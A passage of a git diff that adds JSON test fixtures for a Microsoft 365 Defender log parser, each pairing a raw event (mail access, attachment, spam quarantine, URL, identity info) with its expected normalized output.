+    actions:
+      - set:
+          event.dataset: "identity_info"
+          event.category: ["iam"]
+          event.type: ["user"]
diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json
new file mode 100644
index 000000000..d60cc39a1
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json
@@ -0,0 +1,119 @@
+{
+  "input": {
+    "message": "{\"time\": \"2024-10-03T11:29:06.6566759Z\", \"tenantId\": \"4fbd5d8d-5bb5-40c4-b477-41cf4fc40509\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-CloudAppEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:27:41.2820000Z\", \"properties\": {\"ActionType\": \"MailItemsAccessed\", \"ApplicationId\": 20893, \"AccountDisplayName\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"AccountObjectId\": null, \"AccountId\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"DeviceType\": \"Other\", \"OSPlatform\": \"Unknown\", \"IPAddress\": \"ebce:069e:1ac9:5b57:861b:839d:a2a8:5577\", \"IsAnonymousProxy\": false, \"CountryCode\": \"US\", \"City\": \"redmond\", \"ISP\": \"Microsoft Corporation\", \"UserAgent\": \"Client=REST;Client=RESTSystem;;\", \"IsAdminOperation\": false, \"ActivityObjects\": [{\"Type\": \"Structured object\", \"Role\": \"Parameter\", \"ServiceObjectType\": \"Session ID\"}, {\"Type\": \"Task\", \"Role\": \"Target object\", \"Name\": \"MailItemsAccessed\"}, {\"Type\": \"Property\", \"Role\": \"Parameter\", \"Name\": \"MailAccessType\", \"Value\": \"Bind\"}, {\"Type\": \"Property\", \"Role\": \"Parameter\", \"Name\": \"IsThrottled\", \"Value\": \"False\"}, {\"Type\": \"Account\", \"Role\": \"Actor\", \"Name\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"Id\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"ApplicationId\": 11161, \"ApplicationInstance\": 0}, {\"Type\": \"User\", \"Role\": \"Parameter\", \"Name\": \"John DOE\", \"Id\": \"e1704d61-3815-44cc-a4ad-944623127391\", \"ApplicationId\": 11161, \"ApplicationInstance\": 0}], \"AdditionalFields\": {\"IsSatelliteProvider\": false}, \"ActivityType\": \"Run\", \"ObjectName\": \"MailItemsAccessed\", \"ObjectType\": \"Task\", \"ObjectId\": null, \"AppInstanceId\": 0, \"AccountType\": \"Application\", \"IsExternalUser\": false, \"IsImpersonated\": false, \"IPTags\": [\"Microsoft Corporation\"], \"IPCategory\": \"Cloud provider\", \"UserAgentTags\": null, \"RawEventData\": {\"AppId\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"ClientAppId\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"ClientIPAddress\": \"ebce:069e:1ac9:5b57:861b:839d:a2a8:5577\", \"ClientInfoString\": \"Client=REST;Client=RESTSystem;;\", \"CreationTime\": \"2024-10-03T11:23:17Z\", \"ExternalAccess\": false, \"Folders\": [{\"FolderItems\": [{\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID1\", \"InternetMessageId\": \"<1641470871.2259807.1727868231060@ltx1-app86239.prod.linkedin.com>\", \"SizeInBytes\": 584240}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID2\", \"InternetMessageId\": \"<1.prod.linkedin.com>\", \"SizeInBytes\": 541152}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID4\", \"InternetMessageId\": \"<2.prod.linkedin.com>\", \"SizeInBytes\": 594034}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID5\", \"InternetMessageId\": \"<1@emsecure.net>\", \"SizeInBytes\": 134730}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID6\", \"InternetMessageId\": \"<1@geopod-ismtpd-10>\", \"SizeInBytes\": 343263}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID7\", \"InternetMessageId\": \"<1@.prod.linkedin.com>\", \"SizeInBytes\": 584542}], \"Id\": \"ID8\", \"Path\": \"\\\\Bo\\u00eete de r\\u00e9ception\"}], \"Id\": \"f747c19c-0664-45c8-aac9-8f16e7714de1\", \"InternalLogonType\": 0, \"LogonType\": 0, \"LogonUserSid\": \"S-1\", \"MailboxGuid\": \"6b8eed58-9e96-4167-9ec4-2bb05b47e416\", \"MailboxOwnerSid\": \"S-1\", \"MailboxOwnerUPN\": \"john.doe@example.com\", \"Operation\": \"MailItemsAccessed\", \"OperationCount\": 6, \"OperationProperties\": [{\"Name\": \"MailAccessType\", \"Value\": \"Bind\"}, {\"Name\": \"IsThrottled\", \"Value\": \"False\"}], \"OrganizationId\": \"4fbd5d8d-5bb5-40c4-b477-41cf4fc40509\", \"OrganizationName\": \"neoma.onmicrosoft.com\", \"OriginatingServer\": \"PAWPR07MB9438 (15.20.4200.000)\\r\\n\", \"RecordType\": 50, \"ResultStatus\": \"Succeeded\", \"UserId\": \"john.doe@example.com\", \"UserKey\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"UserType\": 5, \"Version\": 1, \"Workload\": \"Exchange\"}, \"ReportId\": \"98261974_20893_f747c19c-0664-45c8-aac9-8f16e7714de1\", \"Timestamp\": \"2024-10-03T11:23:17Z\", \"Application\": \"Microsoft Exchange Online\"}, \"Tenant\": \"DefaultTenant\"}"
+  },
+  "expected": {
+    "message": "{\"time\": \"2024-10-03T11:29:06.6566759Z\", \"tenantId\": \"4fbd5d8d-5bb5-40c4-b477-41cf4fc40509\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-CloudAppEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:27:41.2820000Z\", \"properties\": {\"ActionType\": \"MailItemsAccessed\", \"ApplicationId\": 20893, \"AccountDisplayName\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"AccountObjectId\": null, \"AccountId\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"DeviceType\": \"Other\", \"OSPlatform\": \"Unknown\", \"IPAddress\": \"ebce:069e:1ac9:5b57:861b:839d:a2a8:5577\", \"IsAnonymousProxy\": false, \"CountryCode\": \"US\", \"City\": \"redmond\", \"ISP\": \"Microsoft Corporation\", \"UserAgent\": \"Client=REST;Client=RESTSystem;;\", \"IsAdminOperation\": false, \"ActivityObjects\": [{\"Type\": \"Structured object\", \"Role\": \"Parameter\", \"ServiceObjectType\": \"Session ID\"}, {\"Type\": \"Task\", \"Role\": \"Target object\", \"Name\": \"MailItemsAccessed\"}, {\"Type\": \"Property\", \"Role\": \"Parameter\", \"Name\": \"MailAccessType\", \"Value\": \"Bind\"}, {\"Type\": \"Property\", \"Role\": \"Parameter\", \"Name\": \"IsThrottled\", \"Value\": \"False\"}, {\"Type\": \"Account\", \"Role\": \"Actor\", \"Name\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"Id\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"ApplicationId\": 11161, \"ApplicationInstance\": 0}, {\"Type\": \"User\", \"Role\": \"Parameter\", \"Name\": \"John DOE\", \"Id\": \"e1704d61-3815-44cc-a4ad-944623127391\", \"ApplicationId\": 11161, \"ApplicationInstance\": 0}], \"AdditionalFields\": {\"IsSatelliteProvider\": false}, \"ActivityType\": \"Run\", \"ObjectName\": \"MailItemsAccessed\", \"ObjectType\": \"Task\", \"ObjectId\": null, \"AppInstanceId\": 0, \"AccountType\": \"Application\", \"IsExternalUser\": false, \"IsImpersonated\": false, \"IPTags\": [\"Microsoft Corporation\"], \"IPCategory\": \"Cloud provider\", \"UserAgentTags\": null, \"RawEventData\": {\"AppId\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"ClientAppId\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"ClientIPAddress\": \"ebce:069e:1ac9:5b57:861b:839d:a2a8:5577\", \"ClientInfoString\": \"Client=REST;Client=RESTSystem;;\", \"CreationTime\": \"2024-10-03T11:23:17Z\", \"ExternalAccess\": false, \"Folders\": [{\"FolderItems\": [{\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID1\", \"InternetMessageId\": \"<1641470871.2259807.1727868231060@ltx1-app86239.prod.linkedin.com>\", \"SizeInBytes\": 584240}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID2\", \"InternetMessageId\": \"<1.prod.linkedin.com>\", \"SizeInBytes\": 541152}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID4\", \"InternetMessageId\": \"<2.prod.linkedin.com>\", \"SizeInBytes\": 594034}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID5\", \"InternetMessageId\": \"<1@emsecure.net>\", \"SizeInBytes\": 134730}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID6\", \"InternetMessageId\": \"<1@geopod-ismtpd-10>\", \"SizeInBytes\": 343263}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID7\", \"InternetMessageId\": \"<1@.prod.linkedin.com>\", \"SizeInBytes\": 584542}], \"Id\": \"ID8\", \"Path\": \"\\\\Bo\\u00eete de r\\u00e9ception\"}], \"Id\": \"f747c19c-0664-45c8-aac9-8f16e7714de1\", \"InternalLogonType\": 0, \"LogonType\": 0, \"LogonUserSid\": \"S-1\", \"MailboxGuid\": \"6b8eed58-9e96-4167-9ec4-2bb05b47e416\", \"MailboxOwnerSid\": \"S-1\", \"MailboxOwnerUPN\": \"john.doe@example.com\", \"Operation\": \"MailItemsAccessed\", \"OperationCount\": 6, \"OperationProperties\": [{\"Name\": \"MailAccessType\", \"Value\": \"Bind\"}, {\"Name\": \"IsThrottled\", \"Value\": \"False\"}], \"OrganizationId\": \"4fbd5d8d-5bb5-40c4-b477-41cf4fc40509\", \"OrganizationName\": \"neoma.onmicrosoft.com\", \"OriginatingServer\": \"PAWPR07MB9438 (15.20.4200.000)\\r\\n\", \"RecordType\": 50, \"ResultStatus\": \"Succeeded\", \"UserId\": \"john.doe@example.com\", \"UserKey\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"UserType\": 5, \"Version\": 1, \"Workload\": \"Exchange\"}, \"ReportId\": \"98261974_20893_f747c19c-0664-45c8-aac9-8f16e7714de1\", \"Timestamp\": \"2024-10-03T11:23:17Z\", \"Application\": \"Microsoft Exchange Online\"}, \"Tenant\": \"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "cloud_app_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-03T11:23:17Z",
+    "action": {
+      "properties": {
+        "Application": "Microsoft Exchange Online",
+        "ApplicationId": "20893",
+        "IPCategory": "Cloud provider",
+        "IPTags": [
+          "Microsoft Corporation"
+        ],
+        "ISP": "Microsoft Corporation",
+        "IsAdminOperation": "false",
+        "IsAnonymousProxy": "false",
+        "IsExternalUser": false,
+        "IsImpersonated": false,
+        "ObjectName": "MailItemsAccessed",
+        "ObjectType": "Task",
+        "RawEventData": "{\"AppId\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"ClientAppId\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"ClientIPAddress\": \"ebce:069e:1ac9:5b57:861b:839d:a2a8:5577\", \"ClientInfoString\": \"Client=REST;Client=RESTSystem;;\", \"CreationTime\": \"2024-10-03T11:23:17Z\", \"ExternalAccess\": false, \"Folders\": [{\"FolderItems\": [{\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID1\", \"InternetMessageId\": \"<1641470871.2259807.1727868231060@ltx1-app86239.prod.linkedin.com>\", \"SizeInBytes\": 584240}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID2\", \"InternetMessageId\": \"<1.prod.linkedin.com>\", \"SizeInBytes\": 541152}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID4\", \"InternetMessageId\": \"<2.prod.linkedin.com>\", \"SizeInBytes\": 594034}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID5\", \"InternetMessageId\": \"<1@emsecure.net>\", \"SizeInBytes\": 134730}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID6\", \"InternetMessageId\": \"<1@geopod-ismtpd-10>\", \"SizeInBytes\": 343263}, {\"ClientRequestId\": \"cd8073a5-7b34-4ba4-9289-542859f3619f\", \"Id\": \"ID7\", \"InternetMessageId\": \"<1@.prod.linkedin.com>\", \"SizeInBytes\": 584542}], \"Id\": \"ID8\", \"Path\": \"\\\\Bo\\u00eete de r\\u00e9ception\"}], \"Id\": \"f747c19c-0664-45c8-aac9-8f16e7714de1\", \"InternalLogonType\": 0, \"LogonType\": 0, \"LogonUserSid\": \"S-1\", \"MailboxGuid\": \"6b8eed58-9e96-4167-9ec4-2bb05b47e416\", \"MailboxOwnerSid\": \"S-1\", \"MailboxOwnerUPN\": \"john.doe@example.com\", \"Operation\": \"MailItemsAccessed\", \"OperationCount\": 6, \"OperationProperties\": [{\"Name\": \"MailAccessType\", \"Value\": \"Bind\"}, {\"Name\": \"IsThrottled\", \"Value\": \"False\"}], \"OrganizationId\": \"4fbd5d8d-5bb5-40c4-b477-41cf4fc40509\", \"OrganizationName\": \"neoma.onmicrosoft.com\", \"OriginatingServer\": \"PAWPR07MB9438 (15.20.4200.000)\\r\\n\", \"RecordType\": 50, \"ResultStatus\": \"Succeeded\", \"UserId\": \"john.doe@example.com\", \"UserKey\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"UserType\": 5, \"Version\": 1, \"Workload\": \"Exchange\"}"
+      },
+      "type": "MailItemsAccessed"
+    },
+    "host": {
+      "os": {
+        "full": "Unknown"
+      },
+      "type": "Other"
+    },
+    "microsoft": {
+      "defender": {
+        "activity": {
+          "objects": [
+            {
+              "Role": "Parameter",
+              "ServiceObjectType": "Session ID",
+              "Type": "Structured object"
+            },
+            {
+              "Name": "MailItemsAccessed",
+              "Role": "Target object",
+              "Type": "Task"
+            },
+            {
+              "Name": "MailAccessType",
+              "Role": "Parameter",
+              "Type": "Property",
+              "Value": "Bind"
+            },
+            {
+              "Name": "IsThrottled",
+              "Role": "Parameter",
+              "Type": "Property",
+              "Value": "False"
+            },
+            {
+              "ApplicationId": 11161,
+              "ApplicationInstance": 0,
+              "Id": "7534549d-2945-469c-9599-c84e749eeeba",
+              "Name": "7534549d-2945-469c-9599-c84e749eeeba",
+              "Role": "Actor",
+              "Type": "Account"
+            },
+            {
+              "ApplicationId": 11161,
+              "ApplicationInstance": 0,
+              "Id": "e1704d61-3815-44cc-a4ad-944623127391",
+              "Name": "John DOE",
+              "Role": "Parameter",
+              "Type": "User"
+            }
+          ],
+          "type": "Run"
+        },
+        "report": {
+          "id": "98261974_20893_f747c19c-0664-45c8-aac9-8f16e7714de1"
+        }
+      }
+    },
+    "related": {
+      "ip": [
+        "ebce:69e:1ac9:5b57:861b:839d:a2a8:5577"
+      ]
+    },
+    "source": {
+      "address": "ebce:69e:1ac9:5b57:861b:839d:a2a8:5577",
+      "geo": {
+        "city_name": "redmond",
+        "country_iso_code": "US"
+      },
+      "ip": "ebce:69e:1ac9:5b57:861b:839d:a2a8:5577"
+    },
+    "user": {
+      "full_name": "7534549d-2945-469c-9599-c84e749eeeba"
+    },
+    "user_agent": {
+      "device": {
+        "name": "Other"
+      },
+      "name": "Other",
+      "original": "Client=REST;Client=RESTSystem;;",
+      "os": {
+        "name": "Other"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_attachment_info.json b/Microsoft/microsoft-365-defender/tests/test_email_attachment_info.json
new file mode 100644
index 000000000..3b71ab37f
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_email_attachment_info.json
@@ -0,0 +1,57 @@
+{
+  "input": {
+    "message": "{\"time\": \"2024-10-03T11:25:07.5625580Z\", \"tenantId\": \"feaf3131-8194-423e-b591-5d7b688b9b49\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailAttachmentInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:22:47.9147121Z\", \"properties\": {\"ReportId\": \"fa0aa6f6-5009-4ee6-9000-e4c3d7b461f2-1047008117853037475-114bd151f8fb0c58642d2170da4ae7d7c57977260ac2cc8905306cab6b2acabc-1\", \"NetworkMessageId\": \"fa0aa6f6-5009-4ee6-9000-e4c3d7b461f2\", \"Timestamp\": \"2024-10-03T11:22:47Z\", \"SenderFromAddress\": \"sender@example.com\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"FileName\": \"Outlook-it5xo44r.jpg\", \"FileType\": \"jpeg\", \"SHA256\": \"114bd151f8fb0c58642d2170da4ae7d7c57977260ac2cc8905306cab6b2acabc\", \"RecipientObjectId\": \"9f888faa-aac1-499d-8119-df55402be910\", \"SenderObjectId\": \"9f95ff60-7f2d-4f5f-baa4-7840c52fae64\", \"SenderDisplayName\": \"John DOE\", \"ThreatNames\": null, \"ThreatTypes\": null, \"DetectionMethods\": null, \"FileSize\": 10996}, \"Tenant\": \"DefaultTenant\"}"
+  },
+  "expected": {
+    "message": "{\"time\": \"2024-10-03T11:25:07.5625580Z\", \"tenantId\": \"feaf3131-8194-423e-b591-5d7b688b9b49\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailAttachmentInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:22:47.9147121Z\", \"properties\": {\"ReportId\": \"fa0aa6f6-5009-4ee6-9000-e4c3d7b461f2-1047008117853037475-114bd151f8fb0c58642d2170da4ae7d7c57977260ac2cc8905306cab6b2acabc-1\", \"NetworkMessageId\": \"fa0aa6f6-5009-4ee6-9000-e4c3d7b461f2\", \"Timestamp\": \"2024-10-03T11:22:47Z\", \"SenderFromAddress\": \"sender@example.com\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"FileName\": \"Outlook-it5xo44r.jpg\", \"FileType\": \"jpeg\", \"SHA256\": \"114bd151f8fb0c58642d2170da4ae7d7c57977260ac2cc8905306cab6b2acabc\", \"RecipientObjectId\": \"9f888faa-aac1-499d-8119-df55402be910\", \"SenderObjectId\": \"9f95ff60-7f2d-4f5f-baa4-7840c52fae64\", \"SenderDisplayName\": \"John DOE\", \"ThreatNames\": null, \"ThreatTypes\": null, \"DetectionMethods\": null, \"FileSize\": 10996}, \"Tenant\": \"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "email"
+      ],
+      "dataset": "email_attachment_info",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-03T11:22:47Z",
+    "action": {
+      "properties": {
+        "RecipientObjectId": "9f888faa-aac1-499d-8119-df55402be910",
+        "SenderDisplayName": "John DOE",
+        "SenderObjectId": "9f95ff60-7f2d-4f5f-baa4-7840c52fae64"
+      }
+    },
+    "email": {
+      "from": {
+        "address": [
+          "sender@example.com"
+        ]
+      },
+      "local_id": "fa0aa6f6-5009-4ee6-9000-e4c3d7b461f2",
+      "to": {
+        "address": [
+          "john.doe@example.com"
+        ]
+      }
+    },
+    "file": {
+      "hash": {
+        "sha256": "114bd151f8fb0c58642d2170da4ae7d7c57977260ac2cc8905306cab6b2acabc"
+      },
+      "name": "Outlook-it5xo44r.jpg",
+      "size": 10996
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "fa0aa6f6-5009-4ee6-9000-e4c3d7b461f2-1047008117853037475-114bd151f8fb0c58642d2170da4ae7d7c57977260ac2cc8905306cab6b2acabc-1"
+        }
+      }
+    },
+    "related": {
+      "hash": [
+        "114bd151f8fb0c58642d2170da4ae7d7c57977260ac2cc8905306cab6b2acabc"
+      ]
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json
new file mode 100644
index 000000000..f2ac938fb
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json
@@ -0,0 +1,47 @@
+{
+  "input": {
+    "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}"
+  },
+  "expected": {
+    "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<01020192520c9bb4-8a4c9d72-a832-47b9-a13f-ce92d3da71ba-000000@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}",
+    "event": {
+      "action": "Moved to quarantine",
+      "category": [
+        "email"
+      ],
+      "dataset": "email_post_delivery_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-03T11:11:32Z",
+    "action": {
+      "properties": {
+        "ActionResult": "Success",
+        "ActionTrigger": "SpecialAction",
+        "DeliveryLocation": "Quarantine"
+      },
+      "type": "Spam ZAP"
+    },
+    "email": {
+      "local_id": "ec1ad6fe-05ae-4125-bf06-498bc60113f7",
+      "message_id": "<1@eu-west-1.amazonses.com>",
+      "to": {
+        "address": [
+          "john.doe@example.com"
+        ]
+      }
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813"
+        },
+        "threat": {
+          "detection": "{\"Spam\": [\"Fingerprint matching\"]}",
+          "types": "Spam"
+        }
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_url_info_2.json b/Microsoft/microsoft-365-defender/tests/test_email_url_info_2.json
new file mode 100644
index 000000000..84218c54b
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_email_url_info_2.json
@@ -0,0 +1,43 @@
+{
+  "input": {
+    "message": "{\"time\": \"2024-10-04T16:36:20.6444402Z\", \"tenantId\": \"98bcadf5-38d6-4d9f-83bd-1185aa13e9c6\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailUrlInfo\", \"_TimeReceivedBySvc\": \"2024-10-04T16:35:56.4645301Z\", \"properties\": {\"ReportId\": \"4b978e05-5fd9-4c73-9a21-b1403cad0c09-4376657523182014843\", \"NetworkMessageId\": \"4b978e05-5fd9-4c73-9a21-b1403cad0c09\", \"Timestamp\": \"2024-10-04T16:35:56Z\", \"Url\": \"https://example.com/index.php?q=some+stuff\", \"UrlDomain\": \"example.com\", \"UrlLocation\": \"Body\"}, \"Tenant\": \"DefaultTenant\"}"
+  },
+  "expected": {
+    "message": "{\"time\": \"2024-10-04T16:36:20.6444402Z\", \"tenantId\": \"98bcadf5-38d6-4d9f-83bd-1185aa13e9c6\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailUrlInfo\", \"_TimeReceivedBySvc\": \"2024-10-04T16:35:56.4645301Z\", \"properties\": {\"ReportId\": \"4b978e05-5fd9-4c73-9a21-b1403cad0c09-4376657523182014843\", \"NetworkMessageId\": \"4b978e05-5fd9-4c73-9a21-b1403cad0c09\", \"Timestamp\": \"2024-10-04T16:35:56Z\", \"Url\": \"https://example.com/index.php?q=some+stuff\", \"UrlDomain\": \"example.com\", \"UrlLocation\": \"Body\"}, \"Tenant\": \"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "email"
+      ],
+      "dataset": "email_url_info",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-04T16:35:56Z",
+    "email": {
+      "local_id": "4b978e05-5fd9-4c73-9a21-b1403cad0c09"
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "4b978e05-5fd9-4c73-9a21-b1403cad0c09-4376657523182014843"
+        }
+      }
+    },
+    "related": {
+      "hosts": [
+        "example.com"
+      ]
+    },
+    "url": {
+      "domain": "example.com",
+      "original": "https://example.com/index.php?q=some+stuff",
+      "path": "/index.php",
+      "port": 443,
+      "query": "q=some+stuff",
+      "registered_domain": "example.com",
+      "scheme": "https",
+      "top_level_domain": "com"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info.json b/Microsoft/microsoft-365-defender/tests/test_identity_info.json
index d5aae258c..0a0174b85 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_info.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_info.json
@@ -5,8 +5,12 @@
   "expected": {
     "message": "{\"time\":\"2022-09-01T07:28:59.5127177Z\",\"tenantId\":\"5ac3ff49-0e19-4600-9ad1-333e64e3b5cc\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-IdentityInfo\",\"properties\":{\"AccountSid\":null,\"AccountDomain\":null,\"AccountName\":null,\"LogonId\":null,\"FileName\":null,\"FolderPath\":null,\"MD5\":null,\"SHA1\":null,\"FileSize\":null,\"SHA256\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"RemoteUrl\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"RemoteDeviceName\":null,\"FileOriginIP\":null,\"FileOriginUrl\":null,\"LocalIP\":\"1.2.3.4\",\"LocalPort\":null,\"RemoteIP\":\"5.6.7.8\",\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"AdditionalFields\":\"{\\\"BaseAddress\\\":2098738167808,\\\"RegionSize\\\":262144,\\\"ProtectionMask\\\":64}\",\"ActionType\":\"NtAllocateVirtualMemoryApiCall\",\"InitiatingProcessVersionInfoCompanyName\":\"Google\",\"InitiatingProcessVersionInfoProductName\":\"Software Reporter Tool\",\"InitiatingProcessVersionInfoProductVersion\":\"102.286.200\",\"InitiatingProcessVersionInfoInternalFileName\":\"software_reporter_tool_exe\",\"InitiatingProcessVersionInfoOriginalFileName\":\"software_reporter_tool.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Software Reporter Tool\",\"InitiatingProcessFolderPath\":\"c:\\\\users\\\\USER\\\\appdata\\\\local\\\\google\\\\chrome\\\\user data\\\\swreporter\\\\102.286.200\\\\software_reporter_tool.exe\",\"InitiatingProcessFileName\":\"software_reporter_tool.exe\",\"InitiatingProcessFileSize\":14687048,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessLogonId\":121834210,\"InitiatingProcessAccountSid\":\"S-1-00-1-1111111-2222222222-3333333333-4444444444\",\"InitiatingProcessAccountDomain\":\"intranet\",\"InitiatingProcessAccountName\":\"group1\",\"InitiatingProcessAccountUpn\":\"user@example.org\",\"InitiatingProcessAccountObjectId\":\"9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2\",\"InitiatingProcessCreationTime\":\"2022-09-01T06:56:23.7887846Z\",\"InitiatingProcessId\":1664,\"InitiatingProcessCommandLine\":\"\\\"software_reporter_tool.exe\\\" --use-crash-handler-with-id=\\\"\\\\\\\\.\\\\pipe\\\\crashpad_11111_XXXXXXXXXXXXXXXX\\\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 